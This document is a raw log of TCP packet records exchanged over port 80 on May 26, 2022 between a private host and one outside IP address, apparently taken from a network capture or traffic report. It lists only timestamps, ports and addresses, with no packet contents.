May 26, 2022 04:06:52.399533987 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.399550915 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.399554968 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.399569035 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.399583101 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.399590015 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.399633884 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.407273054 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.407399893 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.410657883 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.410681009 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.410706997 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.410723925 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.410726070 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.410757065 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.410801888 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.410809994 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.410829067 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.410840988 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.410852909 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.410886049 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.412228107 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412246943 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412262917 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412293911 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412303925 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.412323952 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.412332058 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412349939 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412358046 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.412364006 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412386894 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.412511110 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412528992 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412548065 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412556887 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.412565947 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412583113 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412584066 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.412614107 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.412638903 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.412641048 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412656069 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.412683964 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.419516087 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.419605970 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.423871994 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.423897982 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.423928022 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.423949003 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.423959017 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.423968077 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.423985958 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.423986912 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.424007893 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.424026966 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.424076080 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.424094915 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.424113989 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.425947905 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.425978899 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426003933 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426012993 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.426023960 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426042080 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.426043034 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426059961 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426074028 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426083088 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.426105022 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.426115036 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426157951 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.426183939 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426207066 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426224947 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.426240921 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.426249981 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426269054 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426286936 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.426290989 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426307917 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.426312923 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426330090 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.426333904 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426352024 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426371098 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426371098 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.426383018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.426388025 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.426409006 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.431818008 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.431963921 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.437968016 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.437995911 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.438066006 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.438092947 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.438106060 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.438112974 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.438131094 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.438144922 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.438153028 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.438182116 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.440613985 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.440643072 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.440661907 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.440681934 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.440682888 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.440701962 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.440721989 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.440725088 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.440730095 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.440737009 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.440792084 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.440798998 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.440855980 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.440872908 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.440916061 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.440952063 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.440968037 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.441006899 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.441426992 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.441448927 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.441468000 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.441482067 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.441483974 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.441517115 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.444192886 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.444473028 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.451466084 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.451491117 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.451508045 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.451520920 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.451575041 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.451627016 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.451776028 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.451802015 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.451822042 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.451827049 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.451841116 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.451854944 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.451863050 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.451899052 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.452234030 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.452317953 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.529841900 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.542305946 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.807344913 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.807387114 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.807415009 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.807440042 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.807463884 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.807480097 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.807492018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.807513952 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.807543039 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.807543993 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.807574987 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.807580948 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.807609081 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.807612896 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.807630062 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.807640076 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.807662964 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.807699919 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822148085 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822185993 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822211027 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822228909 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822252989 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822278023 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822302103 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822309017 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822320938 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822370052 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822411060 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822509050 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822561026 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822586060 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822607040 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822612047 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822630882 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822638035 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822657108 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822763920 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822801113 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822827101 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822853088 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822875023 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822900057 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.822900057 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.822942019 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.823204041 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.823231936 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.823256969 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.823287010 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.823309898 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.823328018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.823345900 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.823374033 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.823410034 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836559057 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836584091 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836602926 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836615086 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836632967 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836647987 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836664915 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836678982 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836697102 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836702108 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836714029 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836733103 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836735964 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836740017 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836751938 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836761951 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836771011 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836782932 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836797953 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836801052 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836816072 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836829901 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836833000 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836852074 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836867094 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836894989 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836906910 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836919069 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.836951017 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.836992979 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.850702047 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850744963 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850764990 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850784063 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850800037 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850812912 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850830078 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850842953 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.850897074 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.850929976 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852664948 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852705956 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852727890 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852750063 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852771044 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852787018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852798939 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852819920 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852833033 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852843046 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852861881 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852874041 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852893114 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852902889 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852926970 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852940083 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852961063 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.852971077 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.852993011 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.853002071 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.853017092 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.853024960 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.853045940 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.853059053 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.853095055 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.865576029 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865628004 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865655899 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865683079 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865709066 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865736008 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865752935 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.865772963 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.865792036 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865812063 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865853071 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.865901947 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865946054 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.865961075 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865988970 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.865998983 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866029024 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866055012 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866081953 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866092920 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866116047 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866131067 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866151094 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
